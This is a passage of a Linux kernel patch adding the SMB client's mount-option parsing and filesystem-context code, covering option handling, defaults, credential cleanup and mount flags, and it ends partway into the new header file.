++	if (param->type == fs_value_is_string && param->string[0] == 0) {
++		if (!strcmp("pass", param->key) || !strcmp("password", param->key)) {
++			skip_parsing = true;
++			opt = Opt_pass;
++		} else if (!strcmp("user", param->key) || !strcmp("username", param->key)) {
++			skip_parsing = true;
++			opt = Opt_user;
++		}
++	}
++
++	if (!skip_parsing) {
++		opt = fs_parse(fc, smb3_fs_parameters, param, &result);
++		if (opt < 0)
++			return ctx->sloppy ? 1 : opt;
++	}
++
++	switch (opt) {
++	case Opt_compress:
++		ctx->compression = UNKNOWN_TYPE;
++		cifs_dbg(VFS,
++			"SMB3 compression support is experimental\n");
++		break;
++	case Opt_nodfs:
++		ctx->nodfs = 1;
++		break;
++	case Opt_hard:
++		if (result.negated)
++			ctx->retry = 0;
++		else
++			ctx->retry = 1;
++		break;
++	case Opt_soft:
++		if (result.negated)
++			ctx->retry = 1;
++		else
++			ctx->retry = 0;
++		break;
++	case Opt_mapposix:
++		if (result.negated)
++			ctx->remap = false;
++		else {
++			ctx->remap = true;
++			ctx->sfu_remap = false; /* disable SFU mapping */
++		}
++		break;
++	case Opt_mapchars:
++		if (result.negated)
++			ctx->sfu_remap = false;
++		else {
++			ctx->sfu_remap = true;
++			ctx->remap = false; /* disable SFM (mapposix) mapping */
++		}
++		break;
++	case Opt_user_xattr:
++		if (result.negated)
++			ctx->no_xattr = 1;
++		else
++			ctx->no_xattr = 0;
++		break;
++	case Opt_forceuid:
++		if (result.negated)
++			ctx->override_uid = 0;
++		else
++			ctx->override_uid = 1;
++		break;
++	case Opt_forcegid:
++		if (result.negated)
++			ctx->override_gid = 0;
++		else
++			ctx->override_gid = 1;
++		break;
++	case Opt_perm:
++		if (result.negated)
++			ctx->noperm = 1;
++		else
++			ctx->noperm = 0;
++		break;
++	case Opt_dynperm:
++		if (result.negated)
++			ctx->dynperm = 0;
++		else
++			ctx->dynperm = 1;
++		break;
++	case Opt_sfu:
++		if (result.negated)
++			ctx->sfu_emul = 0;
++		else
++			ctx->sfu_emul = 1;
++		break;
++	case Opt_noblocksend:
++		ctx->noblocksnd = 1;
++		break;
++	case Opt_noautotune:
++		ctx->noautotune = 1;
++		break;
++	case Opt_nolease:
++		ctx->no_lease = 1;
++		break;
++	case Opt_nosparse:
++		ctx->no_sparse = 1;
++		break;
++	case Opt_nodelete:
++		ctx->nodelete = 1;
++		break;
++	case Opt_multichannel:
++		if (result.negated) {
++			ctx->multichannel = false;
++			ctx->max_channels = 1;
++		} else {
++			ctx->multichannel = true;
++			/* if number of channels not specified, default to 2 */
++			if (ctx->max_channels < 2)
++				ctx->max_channels = 2;
++		}
++		break;
++	case Opt_uid:
++		uid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(uid))
++			goto cifs_parse_mount_err;
++		ctx->linux_uid = uid;
++		ctx->uid_specified = true;
++		break;
++	case Opt_cruid:
++		uid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(uid))
++			goto cifs_parse_mount_err;
++		ctx->cred_uid = uid;
++		ctx->cruid_specified = true;
++		break;
++	case Opt_backupuid:
++		uid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(uid))
++			goto cifs_parse_mount_err;
++		ctx->backupuid = uid;
++		ctx->backupuid_specified = true;
++		break;
++	case Opt_backupgid:
++		gid = make_kgid(current_user_ns(), result.uint_32);
++		if (!gid_valid(gid))
++			goto cifs_parse_mount_err;
++		ctx->backupgid = gid;
++		ctx->backupgid_specified = true;
++		break;
++	case Opt_gid:
++		gid = make_kgid(current_user_ns(), result.uint_32);
++		if (!gid_valid(gid))
++			goto cifs_parse_mount_err;
++		ctx->linux_gid = gid;
++		ctx->gid_specified = true;
++		break;
++	case Opt_port:
++		ctx->port = result.uint_32;
++		break;
++	case Opt_file_mode:
++		ctx->file_mode = result.uint_32;
++		break;
++	case Opt_dirmode:
++		ctx->dir_mode = result.uint_32;
++		break;
++	case Opt_min_enc_offload:
++		ctx->min_offload = result.uint_32;
++		break;
++	case Opt_blocksize:
++		/*
++		 * inode blocksize realistically should never need to be
++		 * less than 16K or greater than 16M and default is 1MB.
++		 * Note that small inode block sizes (e.g. 64K) can lead
++		 * to very poor performance of common tools like cp and scp
++		 */
++		if ((result.uint_32 < CIFS_MAX_MSGSIZE) ||
++		   (result.uint_32 > (4 * SMB3_DEFAULT_IOSIZE))) {
++			cifs_errorf(fc, "%s: Invalid blocksize\n",
++				__func__);
++			goto cifs_parse_mount_err;
++		}
++		ctx->bsize = result.uint_32;
++		ctx->got_bsize = true;
++		break;
++	case Opt_rasize:
++		/*
++		 * readahead size realistically should never need to be
++		 * less than 1M (CIFS_DEFAULT_IOSIZE) or greater than 32M
++		 * (perhaps an exception should be considered in the
++		 * for the case of a large number of channels
++		 * when multichannel is negotiated) since that would lead
++		 * to plenty of parallel I/O in flight to the server.
++		 * Note that smaller read ahead sizes would
++		 * hurt performance of common tools like cp and scp
++		 * which often trigger sequential i/o with read ahead
++		 */
++		if ((result.uint_32 > (8 * SMB3_DEFAULT_IOSIZE)) ||
++		    (result.uint_32 < CIFS_DEFAULT_IOSIZE)) {
++			cifs_errorf(fc, "%s: Invalid rasize %d vs. %d\n",
++				__func__, result.uint_32, SMB3_DEFAULT_IOSIZE);
++			goto cifs_parse_mount_err;
++		}
++		ctx->rasize = result.uint_32;
++		break;
++	case Opt_rsize:
++		ctx->rsize = result.uint_32;
++		ctx->got_rsize = true;
++		break;
++	case Opt_wsize:
++		ctx->wsize = result.uint_32;
++		ctx->got_wsize = true;
++		break;
++	case Opt_acregmax:
++		ctx->acregmax = HZ * result.uint_32;
++		if (ctx->acregmax > CIFS_MAX_ACTIMEO) {
++			cifs_errorf(fc, "acregmax too large\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_acdirmax:
++		ctx->acdirmax = HZ * result.uint_32;
++		if (ctx->acdirmax > CIFS_MAX_ACTIMEO) {
++			cifs_errorf(fc, "acdirmax too large\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_actimeo:
++		if (HZ * result.uint_32 > CIFS_MAX_ACTIMEO) {
++			cifs_errorf(fc, "timeout too large\n");
++			goto cifs_parse_mount_err;
++		}
++		if ((ctx->acdirmax != CIFS_DEF_ACTIMEO) ||
++		    (ctx->acregmax != CIFS_DEF_ACTIMEO)) {
++			cifs_errorf(fc, "actimeo ignored since acregmax or acdirmax specified\n");
++			break;
++		}
++		ctx->acdirmax = ctx->acregmax = HZ * result.uint_32;
++		break;
++	case Opt_closetimeo:
++		ctx->closetimeo = HZ * result.uint_32;
++		if (ctx->closetimeo > SMB3_MAX_DCLOSETIMEO) {
++			cifs_errorf(fc, "closetimeo too large\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_echo_interval:
++		ctx->echo_interval = result.uint_32;
++		break;
++	case Opt_snapshot:
++		ctx->snapshot_time = result.uint_64;
++		break;
++	case Opt_max_credits:
++		if (result.uint_32 < 20 || result.uint_32 > 60000) {
++			cifs_errorf(fc, "%s: Invalid max_credits value\n",
++				 __func__);
++			goto cifs_parse_mount_err;
++		}
++		ctx->max_credits = result.uint_32;
++		break;
++	case Opt_max_channels:
++		if (result.uint_32 < 1 || result.uint_32 > CIFS_MAX_CHANNELS) {
++			cifs_errorf(fc, "%s: Invalid max_channels value, needs to be 1-%d\n",
++				 __func__, CIFS_MAX_CHANNELS);
++			goto cifs_parse_mount_err;
++		}
++		ctx->max_channels = result.uint_32;
++		/* If more than one channel requested ... they want multichan */
++		if (result.uint_32 > 1)
++			ctx->multichannel = true;
++		break;
++	case Opt_handletimeout:
++		ctx->handle_timeout = result.uint_32;
++		if (ctx->handle_timeout > SMB3_MAX_HANDLE_TIMEOUT) {
++			cifs_errorf(fc, "Invalid handle cache timeout, longer than 16 minutes\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_source:
++		kfree(ctx->UNC);
++		ctx->UNC = NULL;
++		switch (smb3_parse_devname(param->string, ctx)) {
++		case 0:
++			break;
++		case -ENOMEM:
++			cifs_errorf(fc, "Unable to allocate memory for devname\n");
++			goto cifs_parse_mount_err;
++		case -EINVAL:
++			cifs_errorf(fc, "Malformed UNC in devname\n");
++			goto cifs_parse_mount_err;
++		default:
++			cifs_errorf(fc, "Unknown error parsing devname\n");
++			goto cifs_parse_mount_err;
++		}
++		ctx->source = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->source == NULL) {
++			cifs_errorf(fc, "OOM when copying UNC string\n");
++			goto cifs_parse_mount_err;
++		}
++		fc->source = kstrdup(param->string, GFP_KERNEL);
++		if (fc->source == NULL) {
++			cifs_errorf(fc, "OOM when copying UNC string\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_user:
++		kfree(ctx->username);
++		ctx->username = NULL;
++		if (strlen(param->string) == 0) {
++			/* null user, ie. anonymous authentication */
++			ctx->nullauth = 1;
++			break;
++		}
++
++		if (strnlen(param->string, CIFS_MAX_USERNAME_LEN) >
++		    CIFS_MAX_USERNAME_LEN) {
++			pr_warn("username too long\n");
++			goto cifs_parse_mount_err;
++		}
++		ctx->username = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->username == NULL) {
++			cifs_errorf(fc, "OOM when copying username string\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_pass:
++		kfree_sensitive(ctx->password);
++		ctx->password = NULL;
++		if (strlen(param->string) == 0)
++			break;
++
++		ctx->password = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->password == NULL) {
++			cifs_errorf(fc, "OOM when copying password string\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_ip:
++		if (strlen(param->string) == 0) {
++			ctx->got_ip = false;
++			break;
++		}
++		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
++					  param->string,
++					  strlen(param->string))) {
++			pr_err("bad ip= option (%s)\n", param->string);
++			goto cifs_parse_mount_err;
++		}
++		ctx->got_ip = true;
++		break;
++	case Opt_domain:
++		if (strnlen(param->string, CIFS_MAX_DOMAINNAME_LEN)
++				== CIFS_MAX_DOMAINNAME_LEN) {
++			pr_warn("domain name too long\n");
++			goto cifs_parse_mount_err;
++		}
++
++		kfree(ctx->domainname);
++		ctx->domainname = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->domainname == NULL) {
++			cifs_errorf(fc, "OOM when copying domainname string\n");
++			goto cifs_parse_mount_err;
++		}
++		cifs_dbg(FYI, "Domain name set\n");
++		break;
++	case Opt_srcaddr:
++		if (!cifs_convert_address(
++				(struct sockaddr *)&ctx->srcaddr,
++				param->string, strlen(param->string))) {
++			pr_warn("Could not parse srcaddr: %s\n",
++				param->string);
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_iocharset:
++		if (strnlen(param->string, 1024) >= 65) {
++			pr_warn("iocharset name too long\n");
++			goto cifs_parse_mount_err;
++		}
++
++		if (strncasecmp(param->string, "default", 7) != 0) {
++			kfree(ctx->iocharset);
++			ctx->iocharset = kstrdup(param->string, GFP_KERNEL);
++			if (ctx->iocharset == NULL) {
++				cifs_errorf(fc, "OOM when copying iocharset string\n");
++				goto cifs_parse_mount_err;
++			}
++		}
++		/* if iocharset not set then load_nls_default
++		 * is used by caller
++		 */
++		cifs_dbg(FYI, "iocharset set to %s\n", ctx->iocharset);
++		break;
++	case Opt_netbiosname:
++		memset(ctx->source_rfc1001_name, 0x20,
++			RFC1001_NAME_LEN);
++		/*
++		 * FIXME: are there cases in which a comma can
++		 * be valid in workstation netbios name (and
++		 * need special handling)?
++		 */
++		for (i = 0; i < RFC1001_NAME_LEN; i++) {
++			/* don't ucase netbiosname for user */
++			if (param->string[i] == 0)
++				break;
++			ctx->source_rfc1001_name[i] = param->string[i];
++		}
++		/* The string has 16th byte zero still from
++		 * set at top of the function
++		 */
++		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
++			pr_warn("netbiosname longer than 15 truncated\n");
++		break;
++	case Opt_servern:
++		/* last byte, type, is 0x20 for servr type */
++		memset(ctx->target_rfc1001_name, 0x20,
++			RFC1001_NAME_LEN_WITH_NULL);
++		/*
++		 * BB are there cases in which a comma can be valid in this
++		 * workstation netbios name (and need special handling)?
++		 */
++
++		/* user or mount helper must uppercase the netbios name */
++		for (i = 0; i < 15; i++) {
++			if (param->string[i] == 0)
++				break;
++			ctx->target_rfc1001_name[i] = param->string[i];
++		}
++
++		/* The string has 16th byte zero still from set at top of function */
++		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
++			pr_warn("server netbiosname longer than 15 truncated\n");
++		break;
++	case Opt_ver:
++		/* version of mount userspace tools, not dialect */
++		/* If interface changes in mount.cifs bump to new ver */
++		if (strncasecmp(param->string, "1", 1) == 0) {
++			if (strlen(param->string) > 1) {
++				pr_warn("Bad mount helper ver=%s. Did you want SMB1 (CIFS) dialect and mean to type vers=1.0 instead?\n",
++					param->string);
++				goto cifs_parse_mount_err;
++			}
++			/* This is the default */
++			break;
++		}
++		/* For all other value, error */
++		pr_warn("Invalid mount helper version specified\n");
++		goto cifs_parse_mount_err;
++	case Opt_vers:
++		/* protocol version (dialect) */
++		if (cifs_parse_smb_version(fc, param->string, ctx, is_smb3) != 0)
++			goto cifs_parse_mount_err;
++		ctx->got_version = true;
++		break;
++	case Opt_sec:
++		if (cifs_parse_security_flavors(fc, param->string, ctx) != 0)
++			goto cifs_parse_mount_err;
++		break;
++	case Opt_cache:
++		if (cifs_parse_cache_flavor(fc, param->string, ctx) != 0)
++			goto cifs_parse_mount_err;
++		break;
++	case Opt_witness:
++#ifndef CONFIG_CIFS_SWN_UPCALL
++		cifs_errorf(fc, "Witness support needs CONFIG_CIFS_SWN_UPCALL config option\n");
++			goto cifs_parse_mount_err;
++#endif
++		ctx->witness = true;
++		pr_warn_once("Witness protocol support is experimental\n");
++		break;
++	case Opt_rootfs:
++#ifndef CONFIG_CIFS_ROOT
++		cifs_dbg(VFS, "rootfs support requires CONFIG_CIFS_ROOT config option\n");
++		goto cifs_parse_mount_err;
++#endif
++		ctx->rootfs = true;
++		break;
++	case Opt_posixpaths:
++		if (result.negated)
++			ctx->posix_paths = 0;
++		else
++			ctx->posix_paths = 1;
++		break;
++	case Opt_unix:
++		if (result.negated) {
++			if (ctx->linux_ext == 1)
++				pr_warn_once("conflicting posix mount options specified\n");
++			ctx->linux_ext = 0;
++			ctx->no_linux_ext = 1;
++		} else {
++			if (ctx->no_linux_ext == 1)
++				pr_warn_once("conflicting posix mount options specified\n");
++			ctx->linux_ext = 1;
++			ctx->no_linux_ext = 0;
++		}
++		break;
++	case Opt_nocase:
++		ctx->nocase = 1;
++		break;
++	case Opt_brl:
++		if (result.negated) {
++			/*
++			 * turn off mandatory locking in mode
++			 * if remote locking is turned off since the
++			 * local vfs will do advisory
++			 */
++			if (ctx->file_mode ==
++				(S_IALLUGO & ~(S_ISUID | S_IXGRP)))
++				ctx->file_mode = S_IALLUGO;
++			ctx->nobrl =  1;
++		} else
++			ctx->nobrl =  0;
++		break;
++	case Opt_handlecache:
++		if (result.negated)
++			ctx->nohandlecache = 1;
++		else
++			ctx->nohandlecache = 0;
++		break;
++	case Opt_forcemandatorylock:
++		ctx->mand_lock = 1;
++		break;
++	case Opt_setuids:
++		ctx->setuids = result.negated;
++		break;
++	case Opt_intr:
++		ctx->intr = !result.negated;
++		break;
++	case Opt_setuidfromacl:
++		ctx->setuidfromacl = 1;
++		break;
++	case Opt_strictsync:
++		ctx->nostrictsync = result.negated;
++		break;
++	case Opt_serverino:
++		ctx->server_ino = !result.negated;
++		break;
++	case Opt_rwpidforward:
++		ctx->rwpidforward = 1;
++		break;
++	case Opt_modesid:
++		ctx->mode_ace = 1;
++		break;
++	case Opt_cifsacl:
++		ctx->cifs_acl = !result.negated;
++		break;
++	case Opt_acl:
++		ctx->no_psx_acl = result.negated;
++		break;
++	case Opt_locallease:
++		ctx->local_lease = 1;
++		break;
++	case Opt_sign:
++		ctx->sign = true;
++		break;
++	case Opt_ignore_signature:
++		ctx->sign = true;
++		ctx->ignore_signature = true;
++		break;
++	case Opt_seal:
++		/* we do not do the following in secFlags because seal
++		 * is a per tree connection (mount) not a per socket
++		 * or per-smb connection option in the protocol
++		 * vol->secFlg |= CIFSSEC_MUST_SEAL;
++		 */
++		ctx->seal = 1;
++		break;
++	case Opt_noac:
++		pr_warn("Mount option noac not supported. Instead set /proc/fs/cifs/LookupCacheEnabled to 0\n");
++		break;
++	case Opt_fsc:
++#ifndef CONFIG_CIFS_FSCACHE
++		cifs_errorf(fc, "FS-Cache support needs CONFIG_CIFS_FSCACHE kernel config option set\n");
++		goto cifs_parse_mount_err;
++#endif
++		ctx->fsc = true;
++		break;
++	case Opt_mfsymlinks:
++		ctx->mfsymlinks = true;
++		break;
++	case Opt_multiuser:
++		ctx->multiuser = true;
++		break;
++	case Opt_sloppy:
++		ctx->sloppy = true;
++		break;
++	case Opt_nosharesock:
++		ctx->nosharesock = true;
++		break;
++	case Opt_persistent:
++		if (result.negated) {
++			ctx->nopersistent = true;
++			if (ctx->persistent) {
++				cifs_errorf(fc, "persistenthandles mount options conflict\n");
++				goto cifs_parse_mount_err;
++			}
++		} else {
++			ctx->persistent = true;
++			if ((ctx->nopersistent) || (ctx->resilient)) {
++				cifs_errorf(fc, "persistenthandles mount options conflict\n");
++				goto cifs_parse_mount_err;
++			}
++		}
++		break;
++	case Opt_resilient:
++		if (result.negated) {
++			ctx->resilient = false; /* already the default */
++		} else {
++			ctx->resilient = true;
++			if (ctx->persistent) {
++				cifs_errorf(fc, "persistenthandles mount options conflict\n");
++				goto cifs_parse_mount_err;
++			}
++		}
++		break;
++	case Opt_tcp_nodelay:
++		/* tcp nodelay should not usually be needed since we CORK/UNCORK the socket */
++		if (result.negated)
++			ctx->sockopt_tcp_nodelay = false;
++		else
++			ctx->sockopt_tcp_nodelay = true;
++		break;
++	case Opt_domainauto:
++		ctx->domainauto = true;
++		break;
++	case Opt_rdma:
++		ctx->rdma = true;
++		break;
++	}
++	/* case Opt_ignore: - is ignored as expected ... */
++
++	return 0;
++
++ cifs_parse_mount_err:
++	kfree_sensitive(ctx->password);
++	return -EINVAL;
++}
++
++int smb3_init_fs_context(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx;
++	char *nodename = utsname()->nodename;
++	int i;
++
++	ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
++	if (unlikely(!ctx))
++		return -ENOMEM;
++
++	strscpy(ctx->workstation_name, nodename, sizeof(ctx->workstation_name));
++
++	/*
++	 * does not have to be perfect mapping since field is
++	 * informational, only used for servers that do not support
++	 * port 445 and it can be overridden at mount time
++	 */
++	memset(ctx->source_rfc1001_name, 0x20, RFC1001_NAME_LEN);
++	for (i = 0; i < strnlen(nodename, RFC1001_NAME_LEN); i++)
++		ctx->source_rfc1001_name[i] = toupper(nodename[i]);
++
++	ctx->source_rfc1001_name[RFC1001_NAME_LEN] = 0;
++	/*
++	 * null target name indicates to use *SMBSERVR default called name
++	 *  if we end up sending RFC1001 session initialize
++	 */
++	ctx->target_rfc1001_name[0] = 0;
++	ctx->cred_uid = current_uid();
++	ctx->linux_uid = current_uid();
++	ctx->linux_gid = current_gid();
++	/* By default 4MB read ahead size, 1MB block size */
++	ctx->bsize = CIFS_DEFAULT_IOSIZE; /* can improve cp performance significantly */
++	ctx->rasize = 0; /* 0 = use default (ie negotiated rsize) for read ahead pages */
++
++	/*
++	 * default to SFM style remapping of seven reserved characters
++	 * unless user overrides it or we negotiate CIFS POSIX where
++	 * it is unnecessary.  Can not simultaneously use more than one mapping
++	 * since then readdir could list files that open could not open
++	 */
++	ctx->remap = true;
++
++	/* default to only allowing write access to owner of the mount */
++	ctx->dir_mode = ctx->file_mode = S_IRUGO | S_IXUGO | S_IWUSR;
++
++	/* ctx->retry default is 0 (i.e. "soft" limited retry not hard retry) */
++	/* default is always to request posix paths. */
++	ctx->posix_paths = 1;
++	/* default to using server inode numbers where available */
++	ctx->server_ino = 1;
++
++	/* default is to use strict cifs caching semantics */
++	ctx->strict_io = true;
++
++	ctx->acregmax = CIFS_DEF_ACTIMEO;
++	ctx->acdirmax = CIFS_DEF_ACTIMEO;
++	ctx->closetimeo = SMB3_DEF_DCLOSETIMEO;
++
++	/* Most clients set timeout to 0, allows server to use its default */
++	ctx->handle_timeout = 0; /* See MS-SMB2 spec section 2.2.14.2.12 */
++
++	/* offer SMB2.1 and later (SMB3 etc). Secure and widely accepted */
++	ctx->ops = &smb30_operations;
++	ctx->vals = &smbdefault_values;
++
++	ctx->echo_interval = SMB_ECHO_INTERVAL_DEFAULT;
++
++	/* default to no multichannel (single server connection) */
++	ctx->multichannel = false;
++	ctx->max_channels = 1;
++
++	ctx->backupuid_specified = false; /* no backup intent for a user */
++	ctx->backupgid_specified = false; /* no backup intent for a group */
++
++/*
++ *	short int override_uid = -1;
++ *	short int override_gid = -1;
++ *	char *nodename = strdup(utsname()->nodename);
++ *	struct sockaddr *dstaddr = (struct sockaddr *)&vol->dstaddr;
++ */
++
++	fc->fs_private = ctx;
++	fc->ops = &smb3_fs_context_ops;
++	return 0;
++}
++
++void
++smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx)
++{
++	if (ctx == NULL)
++		return;
++
++	/*
++	 * Make sure this stays in sync with smb3_fs_context_dup()
++	 */
++	kfree(ctx->mount_options);
++	ctx->mount_options = NULL;
++	kfree(ctx->username);
++	ctx->username = NULL;
++	kfree_sensitive(ctx->password);
++	ctx->password = NULL;
++	kfree(ctx->server_hostname);
++	ctx->server_hostname = NULL;
++	kfree(ctx->UNC);
++	ctx->UNC = NULL;
++	kfree(ctx->source);
++	ctx->source = NULL;
++	kfree(ctx->domainname);
++	ctx->domainname = NULL;
++	kfree(ctx->nodename);
++	ctx->nodename = NULL;
++	kfree(ctx->iocharset);
++	ctx->iocharset = NULL;
++	kfree(ctx->prepath);
++	ctx->prepath = NULL;
++}
++
++void
++smb3_cleanup_fs_context(struct smb3_fs_context *ctx)
++{
++	if (!ctx)
++		return;
++	smb3_cleanup_fs_context_contents(ctx);
++	kfree(ctx);
++}
++
++void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb)
++{
++	struct smb3_fs_context *ctx = cifs_sb->ctx;
++
++	if (ctx->nodfs)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_DFS;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_DFS;
++
++	if (ctx->noperm)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_PERM;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_PERM;
++
++	if (ctx->setuids)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SET_UID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SET_UID;
++
++	if (ctx->setuidfromacl)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UID_FROM_ACL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UID_FROM_ACL;
++
++	if (ctx->server_ino)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SERVER_INUM;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
++
++	if (ctx->remap)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SFM_CHR;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SFM_CHR;
++
++	if (ctx->sfu_remap)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SPECIAL_CHR;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SPECIAL_CHR;
++
++	if (ctx->no_xattr)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_XATTR;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_XATTR;
++
++	if (ctx->sfu_emul)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UNX_EMUL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UNX_EMUL;
++
++	if (ctx->nobrl)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_BRL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_BRL;
++
++	if (ctx->nohandlecache)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_HANDLE_CACHE;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_HANDLE_CACHE;
++
++	if (ctx->nostrictsync)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOSSYNC;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOSSYNC;
++
++	if (ctx->mand_lock)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOPOSIXBRL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOPOSIXBRL;
++
++	if (ctx->rwpidforward)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RWPIDFORWARD;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_RWPIDFORWARD;
++
++	if (ctx->mode_ace)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MODE_FROM_SID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MODE_FROM_SID;
++
++	if (ctx->cifs_acl)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_ACL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_ACL;
++
++	if (ctx->backupuid_specified)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPUID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPUID;
++
++	if (ctx->backupgid_specified)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPGID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPGID;
++
++	if (ctx->override_uid)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_UID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_UID;
++
++	if (ctx->override_gid)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_GID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_GID;
++
++	if (ctx->dynperm)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DYNPERM;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DYNPERM;
++
++	if (ctx->fsc)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_FSCACHE;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_FSCACHE;
++
++	if (ctx->multiuser)
++		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_MULTIUSER |
++					    CIFS_MOUNT_NO_PERM);
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MULTIUSER;
++
++
++	if (ctx->strict_io)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_STRICT_IO;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_STRICT_IO;
++
++	if (ctx->direct_io)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DIRECT_IO;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DIRECT_IO;
++
++	if (ctx->mfsymlinks)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MF_SYMLINKS;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MF_SYMLINKS;
++	if (ctx->mfsymlinks) {
++		if (ctx->sfu_emul) {
++			/*
++			 * Our SFU ("Services for Unix" emulation does not allow
++			 * creating symlinks but does allow reading existing SFU
++			 * symlinks (it does allow both creating and reading SFU
++			 * style mknod and FIFOs though). When "mfsymlinks" and
++			 * "sfu" are both enabled at the same time, it allows
++			 * reading both types of symlinks, but will only create
++			 * them with mfsymlinks format. This allows better
++			 * Apple compatibility (probably better for Samba too)
++			 * while still recognizing old Windows style symlinks.
++			 */
++			cifs_dbg(VFS, "mount options mfsymlinks and sfu both enabled\n");
++		}
++	}
++	cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SHUTDOWN;
++
++	return;
++}
+diff --git a/fs/smb/client/fs_context.h b/fs/smb/client/fs_context.h
+new file mode 100644
+index 0000000000000..26093f54d3e65
+--- /dev/null
++++ b/fs/smb/client/fs_context.h
+@@ -0,0 +1,293 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2020, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ *              David Howells <dhowells@redhat.com>
++ */
++
++#ifndef _FS_CONTEXT_H
++#define _FS_CONTEXT_H
++
++#include "cifsglob.h"
++#include <linux/parser.h>
++#include <linux/fs_parser.h>
++
++/* Log errors in fs_context (new mount api) but also in dmesg (old style) */
++#define cifs_errorf(fc, fmt, ...)			\
++	do {						\
++		errorf(fc, fmt, ## __VA_ARGS__);	\
++		cifs_dbg(VFS, fmt, ## __VA_ARGS__);	\
++	} while (0)
++
++enum smb_version {
++	Smb_1 = 1,
++	Smb_20,
++	Smb_21,
++	Smb_30,
++	Smb_302,
++	Smb_311,
++	Smb_3any,
++	Smb_default,
++	Smb_version_err
++};
++
++enum {
++	Opt_cache_loose,
++	Opt_cache_strict,
++	Opt_cache_none,
++	Opt_cache_ro,
